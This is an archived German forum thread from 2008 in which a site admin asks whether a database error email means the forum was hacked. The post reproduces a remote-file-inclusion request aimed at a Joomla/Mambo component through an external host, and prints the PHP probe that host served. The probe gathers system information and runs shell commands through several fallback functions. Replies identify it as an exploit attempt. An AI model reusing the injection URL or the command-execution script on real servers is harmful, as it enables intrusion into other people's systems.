PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Forum gehackt oder DB-Fehler?


Squad
04.07.2008, 12:08
Hallo,

folgendes Email erreichte den Admin:

Datenbankfehler in vBulletin :

mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) /home/www/kfn/forum/includes/class_core.php on line 274

MySQL-Fehler :
Fehler-Nr. :
Datum : Tuesday, July 1st 2008 @ 10:57:35 AM
Skript : http://www.kaffeeforum.de/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt???
Referrer :
IP-Adresse : 211.93.112.42
Benutzername :
Klassenname : vb_databasewobei der Link auf folgenden Inhalt zeigt:

<?
$dir = @getcwd();
$ker = @php_uname();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}

}
Was ist davon zu halten?

Gruß
Squad

Arthur Spooner
04.07.2008, 12:31
Sieht mir stark danach aus als ob jemand versucht hat ein externes Script einzubinden.

Hatsu
04.07.2008, 12:32
Da wird versucht eine Lücke einer Komponente von Joomla/Mambo auszunutzen.